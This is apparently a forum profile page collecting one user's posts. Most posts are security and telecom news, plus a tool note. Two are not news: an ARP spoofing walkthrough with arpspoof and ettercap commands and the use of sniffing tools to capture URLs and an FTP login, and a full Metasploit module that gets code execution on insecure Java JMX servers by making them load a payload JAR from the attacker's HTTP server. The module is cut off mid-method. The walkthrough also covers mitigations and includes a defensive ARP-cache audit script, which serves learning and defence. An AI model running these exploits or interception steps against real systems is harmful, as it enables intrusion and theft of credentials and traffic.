Aerosol

Active Members
  • Posts

    3453
  • Days Won

    22

Everything posted by Aerosol

  1. The Address Resolution Protocol (ARP) is used to resolve IP addresses into MAC addresses (hardware addresses). Computers in a network send messages to each other through MAC addresses. At an initial stage of communication, the computers are only aware of their allocated IP addresses on the network. ARP plays the role of making an ARP request from the requesting device on the network by querying the IP addresses on a receiving device for a MAC address. The receiving network device replies with an ARP reply for further communication. More technically, ARP resolves from the network layer into the data-link layer of the OSI model.

Resolving IP addresses to MAC addresses with ARP is similar to how DNS helps resolve IP addresses to domain names. One major similarity they both have is that they need to do the resolving job on new network connections. In order to speed up the process and avoid repetition, a cache is stored. There is usually a DNS cache, and with ARP there is an ARP cache stored in the ARP table.

ARP spoofing is where an attacker pretends to be another computer on a network by telling the network gateway to request the victim’s MAC address from his/her machine’s IP address. The same process is repeated vice versa with the victim, making the victim see the attacker’s IP address as the gateway address in ARP replies.

The image below illustrates a typical ARP operation:

This image is the same as the process above but with an attacker in the picture:

At this point of interception, the attacker receives every piece of data meant for the victim from the gateway and vice versa. A default result will be disrupted communication between the victim and the gateway. Packets meant for the victim wouldn’t get to him, and the victim may get suspicious. To prevent this, the attacker forwards packets from the gateway to the victim and does the same thing back to the gateway.

Bringing all that to reality!

From a Windows machine, running an arp -a command will list a cache of all neighbour IP addresses with their MAC addresses. This works across Mac and Linux the same way, but our victim machine here is Windows. While we can see that the IP address 192.168.1.1 resolves into the d4:ca:6d:fc:43:9f hardware address, the attacker will begin an ARP proxy (spoof) against this address. The ARP cache on the victim PC as seen above consists of dynamic and static entries.

To monitor how the victim’s machine is communicating with the gateway, I’ll run a continuous ping from the victim machine to the gateway device with the Windows ping -t command. During this test, the following IP addresses are used:

192.168.216.2 - Gateway device
192.168.216.129 - Victim address
192.168.216.130 - Attacker address

The continuous response from the continuous ping means there is a proper connection between the victim PC and the default gateway. Since ARP replies contain MAC address replies from a network device, the attacker’s objective is to flood ARP replies to both the target and the remote host. To achieve this, the arpspoof command line utility is used on a Linux box. The -i switch is used to specify the network interface, -t is for the target host, and -r for the remote host. The remote host pretends to be the one sending the ARP replies, and the target host is the host that receives the reply.

arpspoof -i eth0 -t 192.168.216.2 192.168.216.129

The process is repeated inversely to have a bi-directional packet traffic redirection.

arpspoof -i eth0 -t 192.168.216.129 192.168.216.2

At this point, the communication between the victim machine and the gateway is lost. We had created a ping to the gateway earlier from the victim machine. Requests being made are now timed out. The attacker enables IP forwarding to allow packets to flow from both proxied network devices. That brings back network communication with a Man-In-The-Middle between the victim and the gateway host.

The victim now has a poisoned ARP cache.

From the figure above it appears that both IP addresses 192.168.216.2 and 192.168.216.130 resolve into the hardware address 00-0C-29-81-19-63 as dynamic entries. Ettercap can also be used to achieve what we have done with arpspoof, but it’s far less painful to do with arpspoof. To use ettercap we would have had to run:

ettercap -i interface -Tq -M arp:remote /192.168.216.2/ /192.168.216.129/

ARP Cache Poisoning

ARP cache poisoning involves poisoning the cache of a victim user by flooding it with ARP replies containing MAC addresses to a proxy host. This is what has been achieved in the last step above. ARP spoofing is a technique to achieve ARP cache poisoning. At this point, any kind of network interception can be done. You could view images from the victim’s browser by using driftnet, grab mails with mailsnarf, URLs with urlsnarf, IM messages with msgsnarf, sniff files from NFS traffic with filesnarf, and intercept packets with wireshark or ettercap.

While I had driftnet active on the attacker machine, I opened the contributors page here at InfoSec Institute and got the following:

Just to be a more prying attacker, I had a tmux session with mailsnarf, msgsnarf, and urlsnarf monitoring on 3 panes. I won’t show what the end results of those were, as I’d be putting my privacy in jeopardy by doing so. Okay, I will be nice enough to show results from urlsnarf and dsniff:

While urlsnarf was grabbing the URLs, I also kept dsniff monitoring the victim, and there was an FTP authentication attempt that prompted this:

Also, the dsniff suite provides more MITM tools including sshmitm, webmitm, and webspy. An old way to achieve something similar but not quite specific enough is to use another tool from the dsniff suite called macof, and oh! I didn’t mention arpspoof is also from the dsniff suite. Macof floods switched LAN ports with random MAC addresses.

That looks too noisy, and since it just starts flooding, I only take it for an option when I’m considering ARP spoofing as a Denial-Of-Service asset. ARP spoofing attacks would be impossible if there was an authentication mechanism for ARP replies.

Mitigating ARP spoof attacks

Prevent duplicate MACs: This can be achieved by using a good Intrusion Detection System (IDS). It can be set to detect large volumes of ARP traffic, duplicate MACs, and MAC floods. Taking a closer look at figure 9, there are two IP address entries with the same MAC 00-0C-29-81-19-63, which is something to be prevented.

Keep track of ethernet/IP address pairings. The Arpwatch tool or ArpSNMP comes in really handy when trying to do this. It is a Unix utility.

Use static ARP entries. As seen above, the affected entries in the victim ARP cache were dynamic entries.

Arpwatch and Arpsnmp have been mentioned earlier. Another good tool for a preventive measure against ARP attacks is Arpon. Before discussing arpon further, I would also like to discuss the arping tool. Arping works just like the ping command line utility. Unlike ping, which checks if hosts are reachable by their domain names or IP addresses and then resolves domain names into IP addresses, arping resolves pinged IP addresses into MAC addresses and also allows pinging MAC addresses directly with an interface specified with the -i switch.

ARPON is an ARP handler inspection tool that secures ARP. It uses two techniques to achieve this: SARPI (Static ARP Inspection) and DARPI (Dynamic ARP Inspection). The two techniques protect against both distributed attacks and bi-directional attacks as we have demonstrated with macof and arpspoof. To properly use the bi-directional protection of Arpon, it should be installed on both network devices, including the target and remote host, which are our victim machine and the default gateway. For the distributed attack prevention, Arpon should be installed on all machines in the LAN.

Arpon has a daemon that runs from boot when installed on a computer. It helps fight against ARP poisoning attacks with SARPI and DARPI by blocking them, while tools like Arpwatch and Arpsnmp will just point out the attack’s presence.

Conclusion

The ARP attacks seen involved taking advantage of the fact that the ARP protocol resolves addresses from the network layer of the OSI model to the data-link layer without any form of authentication. By sending excess ARP replies, an attacker can fool a target machine into thinking that he can be addressed by the hardware address of another machine in the network. One major way to prevent this is to avoid MAC duplication in the ARP cache. Various tools were mentioned for mitigation, but Arpon seems to be the most powerful tool presently. A future with IPv6 may help put an end to attacks like this. Source
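The mitigation section above recommends two checks: flag a MAC that appears under more than one IP in the ARP cache, and keep track of ethernet/IP pairings the way arpwatch does. Below is an added example in Python (not code from the original post or from arpwatch) that implements both over Windows-style arp -a output. The two arp -a samples are constructed to match the addresses and the 00-0C-29-81-19-63 hardware address shown in the post; the "before" baseline MAC for the gateway is invented.

```python
"""Audit a host's ARP cache for the two symptoms the post's mitigation section
describes: one MAC claimed by several IPs (duplicate MAC) and an IP whose MAC
differs from a recorded baseline (the arpwatch-style pairing check).
Added example, not code from the original post; the arp -a samples are
constructed to match the addresses and hardware address shown in the post."""
import re
from collections import defaultdict

# Constructed `arp -a` output from the Windows victim after the cache has been
# poisoned: the gateway (.2) and the attacker (.130) share one hardware address.
ARP_A_POISONED = """\
Interface: 192.168.216.129 --- 0xb
  Internet Address      Physical Address      Type
  192.168.216.2         00-0c-29-81-19-63     dynamic
  192.168.216.130       00-0c-29-81-19-63     dynamic
  192.168.216.255       ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed baseline recorded on the same host before the attack
# (the gateway's real MAC here is invented).
ARP_A_CLEAN = """\
Interface: 192.168.216.129 --- 0xb
  Internet Address      Physical Address      Type
  192.168.216.2         00-50-56-e1-2a-7b     dynamic
  192.168.216.130       00-0c-29-81-19-63     dynamic
  192.168.216.255       ff-ff-ff-ff-ff-ff     static
"""

# One cache entry: IPv4 address, MAC with '-' or ':' separators, entry type.
ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(dynamic|static)\s*$",
    re.IGNORECASE,
)


def parse_arp_cache(text):
    """Return {ip: (mac, type)} from Windows-style `arp -a` output.
    MACs are normalised to lowercase, colon-separated form."""
    entries = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            ip, mac, kind = m.groups()
            entries[ip] = (mac.lower().replace("-", ":"), kind.lower())
    return entries


def is_group_address(mac):
    """True for broadcast/multicast MACs (I/G bit of the first octet set);
    these legitimately sit under many IPs and must not count as duplicates."""
    return int(mac.split(":")[0], 16) & 1 == 1


def find_duplicate_macs(entries):
    """Return {mac: [ips]} for every unicast MAC claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, (mac, _kind) in entries.items():
        if not is_group_address(mac):
            by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def find_changed_pairings(baseline, current):
    """Return {ip: (old_mac, new_mac)} for IPs whose MAC no longer matches the
    baseline; this is the "changed ethernet address" event arpwatch reports."""
    changed = {}
    for ip, (old_mac, _kind) in baseline.items():
        if ip in current and current[ip][0] != old_mac:
            changed[ip] = (old_mac, current[ip][0])
    return changed


def audit(baseline_text, current_text):
    """Run both checks; returns a list of findings, empty when the current
    cache is consistent with the baseline."""
    baseline = parse_arp_cache(baseline_text)
    current = parse_arp_cache(current_text)
    findings = []
    for mac, ips in sorted(find_duplicate_macs(current).items()):
        findings.append(f"duplicate MAC {mac} claimed by {', '.join(ips)}")
    for ip, (old, new) in sorted(find_changed_pairings(baseline, current).items()):
        findings.append(f"pairing changed for {ip}: {old} -> {new}")
    return findings


if __name__ == "__main__":
    for finding in audit(ARP_A_CLEAN, ARP_A_POISONED):
        print("ALERT:", finding)
```

Run against the poisoned sample this reports both the duplicate MAC (two IPs on 00:0c:29:81:19:63) and the changed gateway pairing; the duplicate-MAC check alone already catches the situation the post's figure 9 shows, while the pairing check is what you need to catch a spoof of a single host where no duplicate is visible in the cache. Broadcast and multicast addresses are skipped on purpose, since they are always shared and would otherwise produce constant false positives.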
  2. A cyber mercenary group, codenamed Desert Falcons, has infected thousands of government departments and businesses with malware, according to Kaspersky Lab. The security firm revealed the campaign at its Security Analyst Summit, revealing that it has already detected 3,000 confirmed Desert Falcons infections on Android and Windows devices. Victims include military and government bodies, media outlets, financial firms, research institutions, political activists, energy companies and physical security providers in Egypt, Palestine, Israel and Jordan. "The Desert Falcons cyber criminals are native Arabic speakers, and it is believed to be the first known Arab group to develop and run a full cyber espionage operation," read the report. "Desert Falcons began its operations in 2011, with the first infections taking place in 2013. The group became very active in late 2014/early 2015." The group is believed to have around 30 members split into three teams, and focuses mainly on stealing political and military intelligence. Kaspersky estimated that the hackers managed to steal more than one million files and documents containing sensitive information before being discovered. Dmitry Bestuzhev, security expert at Kaspersky Lab's Great team, said the Desert Falcons target victims with tailored campaigns which include a prolonged period of surveillance. "The individuals behind this threat are highly determined, active and with good technical, political and cultural insight," he explained. "Using only phishing emails, social engineering and homemade tools and backdoors, Desert Falcons was able to infect hundreds of sensitive and important victims." The campaign used a variety of malware types, and is one of the first to attempt to spread malware using Facebook chat. "The attackers created authentic Facebook accounts and then interacted with chosen victims through common Facebook pages until they had gained their trust. 
Then they sent Trojan files in the chat hidden as an image or similar," read the paper. "The Desert Falcons depends on two different backdoors to spy on victims. Both are homemade and are under continuous development. We were able to identify and collect more than 100 malware samples used by the Desert Falcons." The selection of tools gives the hackers a variety of powers, including key-logging and the ability to upload and download files to command and control servers owned by the group. Other powers include the ability to view information on all the .doc and .xls files on the victim's hard disk or connected USB devices, steal passwords and record audio files using infected machines. Kaspersky has managed to identify some Desert Falcon members, but expects the group to continue operating. "We were able to track and identify the full profile of some of the attackers, including Facebook and Twitter accounts, private blogs and websites," read the paper. "[but] we expect their operations to carry on developing more trojans and using more advanced techniques." Desert Falcons was one of many high-profile threat campaigns revealed during Kaspersky's security conference. Kaspersky researchers reported on Tuesday that they had uncovered a widespread Equation attack infecting hard drive operating systems with malware. The team also reported a Carbanak campaign which is believed to have stolen over $1bn from financial institutions. Source
  3. Open source SWF player promises alternative to Adobe's endless security horror In November 2012 the Mozilla Foundation announced “Project Shumway”, an effort to create a “web-native runtime implementation of the SWF file format.” Two-and-a-bit years, and a colossal number of Flash bugs later, Shumway has achieved an important milestone by appearing in a Firefox nightly, a step that suggests it's getting closer to inclusion in the browser. Shumway's been available as a plugin for some time, and appears entirely capable of handling the SWF files. Few average users know of Shumway's existence, never mind seek it out. So the inclusion of the software in Firefox's nightlies will give it greater exposure. For now the code can only play certain videos hosted on Amazon.com, but developers intend to expand the list of sites from which Shumway will play SWF files. For now, Shumway-in-Firefox-nightlies works only on Windows Vista or later versions of Windows, and OSX. But expanded support is promised. When it arrives in a full version of Firefox, it will mean that about 15.1 per cent of all web surfing won't need Flash (based on W3counter market share data). Flash is a security nightmare that we recently suggested deserves to rot in an unmarked grave. Mozilla looks to be giving it a welcome shove in just that direction. Source
  4. MICROSOFT HAS REVEALED that the forthcoming Windows 10 operating system, which is currently in live public beta, will support the Fast Identification Online (Fido) security standard. The Fido Version 1 standard became final in January and is already in use by companies such as Yubico in creating a Universal Second Factor that works across sites using USB or near-field communication, along with fingertip impulses to trigger it. The adoption of Fido in Windows 10 will allow users to lock down machines, rendering them useless to anyone without a Fido authentication device. This could take the form of USB stick, a biometric or a myriad other forms, some of which are yet to be thought of. Stina Ehrensvard, CEO and founder of Yubico, told The INQUIRER: "Yubico shares the same mission as the Fido Alliance; to make secure log-in easy and affordable for everyone, and enable one single authentication device to access any number of applications. "Fido open standards specifications were published only a few months ago, resulting in a thriving ecosystem of chip, device, service, open source and enterprise software providers. The announcement of Fido support in Windows 10 is an important milestone for realising our mission." Fido was developed in part by Google, and the system is already in place to provide protection to Google accounts. Version 2.0 will be the one that arrives with Windows 10, with further input from Microsoft into the refinements. Scott Charney, Microsoft's go-to guy for Trustworthy Computing, said at a White House Cybersecurity and Consumer Protection Summit at Stanford University that "shaping a cyber-savvy workforce and moving beyond passwords in partnership with the private sector" is one of the company's top priorities. That, and Judge Dredd helmets. Fido is already up and running through Bank of America, PayPal and Microsoft sites, and is designed as a fully open standard so that anyone can add the tech to their website credentials. 
A Microsoft blog post confirms that the company will work with all Windows sign-in scenarios including software as a service provided by Azure Active Directory. Can we move away from passwords? Is having an open system like Fido the answer, or should we be creating bespoke solutions? How do you feel about putting all your credentials against one biometric? Let us know below. *This is the stupidest idea for a password ever. Don't use it. Source
  5. The chairman of the Federal Communications Commission announced recently he would seek to reclassify broadband Internet as a common carrier service so the government could enforce net neutrality rules, something that President Obama supports. Some telecom executives and Republicans in Congress are calling this an “extreme” and “backwards” proposal, and they’re investigating the President’s role in pushing for it. But we’ve only reached this pivotal moment in the net neutrality debate because of past efforts by corporate lobbyists and their political allies to weaken the government’s ability to protect the open Internet. Without the telecommunications industry’s massive power to design policies in its favor, the government would most likely already have the authority it needs to ensure net neutrality. In the early 2000s, back when Gmail was still for Garfield fans only, policymakers were facing important questions about the nature of broadband Internet and how it should be treated by regulators. The last major telecommunications bill was passed by Congress in 1996 and since then the technology had advanced rapidly, with two different services, cable Internet and digital subscriber line (DSL), becoming widely available. These services both operated on infrastructure that was originally built for other purposes (cable television and landline telephony, respectively), and since the 1996 bill didn’t address Internet service in a substantial way, regulators had simply applied the regulatory treatment traditionally associated with the infrastructures to the new Internet services being offered on them. 
That meant that cable Internet, carried over lines used to transmit television, was treated like an “information service,” while DSL, carried over copper telephone wires, was treated like a “telecommunications service.” The distinction is critical because under the 1996 law telecommunications services— things like wireline telephone service—are regulated more heavily under Title II of the law while information services—things like television channels and websites—are more lightly regulated under the Federal Communication Commission’s ancillary authority originating in Title I. Cable systems also face cable-specific rules from Title VI, which was added to communications law in 1984. Title II was designed by Congress in 1934 to prevent the companies that provide basic communications services from engaging in anticompetitive and discriminatory practices. It treats these services as “common carriers”—essentially private utilities that have to meet certain public benefit, openness, and non-discrimination requirements in exchange for owning and operating monopolies. At the time of its creation this applied primarily to telephone companies, but the requirements of the law are also well suited to preventing internet service providers from violating net neutrality principles. To consumers, cable and DSL ISPs were offering nearly identical services, but because of the outdated laws they were being treated very differently by regulators. In order to achieve regulatory parity, regulators had to decide if broadband service was more like a cable television channel or more like landline telephone service. In other words, they had to choose between regulating cable Internet up to Title II or deregulating DSL Internet service down to its general Title I authority. The Baby Bells In 2000 the DSL industry was dominated by the four remaining companies from the breakup of the old AT&T monopoly—Verizon, BellSouth, SBC Communications, and Qwest. 
These companies, commonly referred to as the “Baby Bells,” still operated regional monopolies and therefore were required under the 1996 bill to allow other carriers to access their networks. Because of this requirement, a new and growing industry of startup ISPs (competitive local exchange carriers, or CLECs) had begun leasing copper-line infrastructure from the Bells and offering competing broadband service to customers on their lines. Not surprisingly, as the Baby Bells rolled out their DSL service, they saw the cable industry’s more relaxed regulations and total lack of competition and wanted the same treatment from the government. They launched a massive lobbying effort to push the Clinton and Bush administrations, the Federal Communication Commission, and Congress to eliminate the network sharing requirement that had spawned the CLEC market and to deregulate DSL services more broadly. Between 1999 and 2002 the four companies spent a combined $95.6 million on lobbying the federal government, according to data from the Center for Responsive Politics, which would rank them above such trade group lobbying behemoths as the Chamber of Commerce and the American Medical Association in total lobbying expenditures for the years. The companies also spent millions to lobby the public directly through aggressive advertising and public relations campaigns. Their basic strategy was to push a bargain that if DSL was reclassified and they were allowed to operate regional monopolies without having to follow common carrier rules, they would voluntarily increase their investments in infrastructure and speed up the deployment of broadband in underserved areas. One of the Baby Bells’ closest allies in Congress at the time was Louisiana Democrat-turned-Republican Rep. Billy Tauzin, who in 2001 had become the Chairman of the Energy and Commerce Committee, which oversees telecommunications issues and the Federal Communications Commission. 
The four companies had given hundreds of thousands to Tauzin’s electoral campaigns over the years. In the 2000 election, Verizon was Tauzin’s largest single donor ($13,750) and SBC was his fourth largest ($10,000). In the 2002 election the Baby Bells gave more than $61,300 to Tauzin’s campaign committee and leadership PAC, making him the top congressional recipient of their political spending for that cycle. They also helped pay for a $400,000 Mardi Gras-themed fundraiser for Tauzin at the 2000 Republican National Convention. Tauzin’s son was employed at the time as a lobbyist for one of the Baby Bells, BellSouth, in Louisiana. (For more information on Tauzin’s deep relationship with the Bell companies, check out this article originally published at Interactive Weekly). In 2001 Tauzin teamed up with Democratic Rep. John Dingell, himself a top recipient of Baby Bell largesse, to sponsor legislation that would give the companies pretty much everything they had been lobbying for. Their bill, the “Internet Deployment and Broadband Freedom Act,” known more commonly as “Tauzin-Dingell,” would exempt Verizon and the Baby Bells from having to share their networks with competitive start-up carriers as required by the 1996 bill. The bill also proposed to add a new section to Title II of the Communications Act to broadly exempt broadband Internet, regardless of the carrier technology, from a wide swath of the regulatory powers held by the FCC and the states. “Neither the [Federal Communications] Commission, nor any State, shall have authority to regulate the rates, charges, terms, or conditions for, or entry into the provision of, any high speed data service, Internet backbone service, or Internet access service,” the bill text read in part. On February 27, 2002, Tauzin’s bill was brought to the floor of the House and passed by a vote of 273-157. Both Democrats and Republicans were divided on the bill, but it still won support from a majority of both parties. 
More than party affiliation, campaign contributions from Verizon and the Baby Bells were a better predictor of how members would vote, a fact that suggests the companies had a powerful influence over policymakers as they debated the future of broadband regulation. According to an analysis by the Center for Responsive Politics, the representatives who voted in favor of Tauzin-Dingell received, on average, 2.9 times more money from Verizon and the Baby Bells in the form of campaign contributions in the 2002 election than did the Representatives who voted against it. The cable industry was officially indifferent to Tauzin-Dingell, despite the fact that it benefited its chief competitor industry, because they recognized that it favored a “regulate down” approach and, if enacted, could put them in a better position for avoiding new regulations on their own services. “NCTA strongly believes that marketplace competition is the best way to foster the availability of broadband services to all Americans,” the National Cable & Telecommunications Association (NCTA) said in a statement. “Thus, we have not opposed the Tauzin-Dingell bill nor advocated that regulatory conditions be placed on broadband competitors." Tauzin’s friend Powell At the same time that the House was voting on the Tauzin-Dingell bill, the Federal Communications Commission was considering separately what they could do through rulemaking to achieve regulatory parity between cable and DSL. In 2000 the FCC launched a rulemaking proceeding to determine how to classify and regulate cable internet service. 
In 2002 they opened a similar proceeding for DSL that sought to “resolve outstanding issues regarding the classification of telephone-based broadband Internet access services and the regulatory implications of that classification.” Beginning in 2001, the Federal Communications Commission was chaired by Michael Powell, the son of Colin Powell and a former attorney for GTE Corp., the company that would form Verizon after merging with Bell Atlantic in 2000. Powell, in many ways, owes his position on the FCC to none other than Rep. Billy Tauzin. Back in 1997, Tauzin lobbied to get Powell appointed to the commission over incumbent Rachelle Chong, who was seeking a second term. Then, in 2001, Tauzin led the charge to get President Bush to elevate Powell to the chairmanship over Pat Wood III, who, until Tauzin got involved, was widely expected to take the position. As recounted by Village Voice reporter Brendan Koerner, Tauzin “engineered” Powell’s accession to the chairmanship as one of his first Bush-era acts. To recap: Powell, a former attorney for Verizon, was hand-picked to lead the FCC by the head of the congressional committee with oversight over the commission, Billy Tauzin, and immediately faced major decisions on the regulatory classification of the Internet, an issue that Tauzin had spent years working on and that directly impacted the bottom line of his biggest donors. Powell seems to have received the message that Billy Tauzin and the House of Representatives sent when they voted to gut Title II as it applies to the Internet. On Feb. 14, 2002, just two weeks after the House passed the Tauzin-Dingell bill, the Powell-led FCC took an unusual step that set in motion their approach to regulatory parity for cable and DSL. 
The Commission leapfrogged the typical public comment period and “notice of proposed rulemaking” and issued a declaratory ruling that cable Internet was properly classified as an information service, and thus not subject to common carrier rules, including line sharing requirements and nondiscrimination protections. One month later they released a rule proposal that tentatively concluded that DSL would also be reclassified as a Title I information service. The DSL reclassification was finalized in 2005. It’s unclear what kinds of discussions Billy Tauzin was having with Powell around the FCC’s decisions to classify broadband as a Title I information service, but watchdog groups were accusing him of “meddling” in related rulemaking proceedings at the agency around the same time. Later accounts of Tauzin’s involvement in health care legislation as a lobbyist for the pharmaceutical industry suggest that he can be aggressive at lobbying policymakers to bend his way. With the FCC’s rulings, broadband Internet service was officially differentiated from dial-up Internet service for regulatory purposes and reclassified to the same category of lightly regulated information services as things like websites or apps. The Powell-led FCC had finalized nearly all of the broadband deregulation that the Baby Bells had lobbied for and that Rep. Tauzin and Baby Bell-backed representatives had endorsed, but without having to go through Congress and change the law. These rulings led to the elimination of line-sharing requirements and decimated the CLEC industry that had been competing with the local monopolies for residential broadband customers. Years later Verizon and Comcast would use the rulings to kill the FCC’s attempts at enforcing net neutrality. 
In 2010, the DC Circuit Court of Appeals ruled in favor of Comcast in determining that the FCC did not have “reasonably ancillary” jurisdiction to use Title I of the Communication Act to stop Comcast from throttling peer-to-peer programs because they could not cite a statutorily mandated responsibility empowering them to do so. In 2014 the DC Circuit cited the Title I classification of ISPs in siding with Verizon and vacating the FCC’s second attempt at promulgating net neutrality rules. “Given that the Commission has chosen to classify broadband providers in a manner that exempts them from treatment as common carriers, the Communications Act expressly prohibits the Commission from nonetheless regulating them as such,” the court stated. Michael Powell left the FCC in 2005, but he is still one of the most powerful figures in determining Internet regulations and net neutrality rules. Powell is now the president and chief lobbyist of the NCTA, a cable industry trade group that has been the hands-down leader in the industry’s efforts to block net neutrality. Under Powell, the organization has increased its spending on lobbying year after year and it now spends more on lobbying than any other organization in the communications sector. With Powell at the helm working his connections in Congress and at the FCC, they seemed to be getting maximum bang for the buck because so-called revolving door connections make lobbying spending more effective—until current FCC Chairman and former NCTA chief Tom Wheeler announced that he would propose to reclassify broadband as Obama suggested. Although it looks as though the FCC is about to reclassify broadband as Title II, many of the same factors that led to the deregulatory rulings of the early 2000s are still in play. Members of Congress, disproportionately those who are financially supported by large cable and telecom companies, are lobbying against Title II reclassification. 
The broadband industry is now more consolidated than ever and the industry’s promise of infrastructure investment in exchange for deregulation has not come to pass. The companies that provide Internet service to most Americans have not always been deregulated monopolies with the ability to create fast lanes and slow lanes on the Internet. They got there by using many of the tactics that have fueled the record levels of distrust in the U.S. government—bought politicians, corrupt legislation, and revolving-door power trading. While it’s not possible to examine the counterfactual history in which policymakers designed regulatory parity for the Internet with total independence, it should be acknowledged that the current net neutrality debate is based on past policy decisions, including the original removal of broadband from Title II, that were shaped by lobbying dollars and the raw monopoly power of America’s top telecommunications companies. Donny Shaw is a freelance journalist covering money in politics, tech, monopoly power and the legislative process. Source
  6. Reflected File Download
RFD is a web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from a trusted domain. Read more: http://dl.packetstormsecurity.net/papers/presentations/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
  7. Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.
Changes: Added non-existent file to the regression test config. Multiple bug fixes.
Link download: here
Link project: Samhain Labs | samhain
8.

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Java::Jmx
  include Msf::Exploit::Remote::HttpServer
  include Msf::Java::Rmi::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java JMX Server Insecure Configuration Java Code Execution',
      'Description'    => %q{
        This module takes advantage a Java JMX interface insecure configuration, which would allow loading classes
        from any remote (HTTP) URL. JMX interfaces with authentication disabled (com.sun.management.jmxremote.authenticate=false)
        should be vulnerable, while interfaces with authentication enabled will be vulnerable only if a weak configuration
        is deployed (allowing to use javax.management.loading.MLet, having a security manager allowing to load a ClassLoader
        MBean, etc.).
      },
      'Author'         => [
        'Braden Thomas', # Attack vector discovery
        'juan vazquez'   # Metasploit module
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['URL', 'https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf'],
        ['URL', 'http://www.accuvant.com/blog/exploiting-jmx-rmi']
      ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Privileged'     => false,
      'Payload'        => {
        'BadChars'    => '',
        'DisableNops' => true
      },
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'WfsDelay' => 10
      },
      'Targets'        => [
        [ 'Generic (Java Payload)', {} ]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 22 2013'
    ))

    register_options([
      Opt::RPORT(1617)
    ], self.class)
  end

  # HTTP server side: serves the MLet text file and the payload JAR it references
  def on_request_uri(cli, request)
    if request.uri =~ /mlet$/
      jar = "#{rand_text_alpha(8 + rand(8))}.jar"
      mlet = "<HTML><mlet code=\"metasploit.JMXPayload\" "
      mlet << "archive=\"#{jar}\" "
      mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" "
      mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
      send_response(cli, mlet, {
        'Content-Type' => 'application/octet-stream',
        'Pragma' => 'no-cache'
      })
      print_status("Replied to request for mlet")
    elsif request.uri =~ /\.jar$/i
      p = regenerate_payload(cli)
      jar = p.encoded_jar
      paths = [
        ["metasploit", "JMXPayloadMBean.class"],
        ["metasploit", "JMXPayload.class"],
      ]
      jar.add_files(paths, [ Msf::Config.data_directory, "java" ])
      send_response(cli, jar.pack, {
        'Content-Type' => 'application/java-archive',
        'Pragma' => 'no-cache'
      })
      print_status("Replied to request for payload JAR")
    end
  end

  def check
    connect
    unless is_rmi?
      return Exploit::CheckCode::Safe
    end

    mbean_server = discover_endpoint
    disconnect
    if mbean_server.nil?
      return Exploit::CheckCode::Safe
    end

    # Reconnect to the MBean server address the registry handed back (the posted
    # copy repeated the 'RPORT' key here, which silently dropped the address).
    connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
    unless is_rmi?
      return Exploit::CheckCode::Unknown
    end

    jmx_endpoint = handshake(mbean_server)
    disconnect
    if jmx_endpoint.nil?
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Appears
  end

  def exploit
    @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"

    connect
    print_status("#{peer} - Sending RMI Header...")
    unless is_rmi?
      fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
    end

    print_status("#{peer} - Discovering the JMXRMI endpoint...")
    mbean_server = discover_endpoint
    disconnect
    if mbean_server.nil?
      fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
    else
      print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
    end

    # Same fix as in #check: address and port of the discovered MBean server
    connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
    unless is_rmi?
      fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
    end

    print_status("#{peer} - Proceeding with handshake...")
    jmx_endpoint = handshake(mbean_server)
    if jmx_endpoint.nil?
      fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
    else
      print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
    end

    print_status("#{peer} - Loading payload...")
    unless load_payload(jmx_endpoint)
      fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
    end

    print_status("#{peer} - Executing payload...")
    invoke_run_stream = invoke_stream(
      obj_id: jmx_endpoint[:id].chop,
      object: "#{@mlet}:name=jmxpayload,id=1",
      method: 'run'
    )
    send_call(call_data: invoke_run_stream)

    disconnect
  end

  # Sends the JRMI protocol header and expects a ProtocolAck back
  def is_rmi?
    send_header
    ack = recv_protocol_ack
    if ack.nil?
      return false
    end

    true
  end

  # Looks up the "jmxrmi" name in the RMI registry and extracts the MBean server stub
  def discover_endpoint
    send_call(call_data: discovery_stream)
    return_data = recv_return

    if return_data.nil?
      vprint_error("#{peer} - Discovery request didn't answer")
      return nil
    end

    answer = extract_object(return_data, 1)

    if answer.nil?
      vprint_error("#{peer} - Unexpected JMXRMI discovery answer")
      return nil
    end

    case answer
    when 'javax.management.remote.rmi.RMIServerImpl_Stub'
      mbean_server = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
    else
      vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{answer}")
      return nil
    end
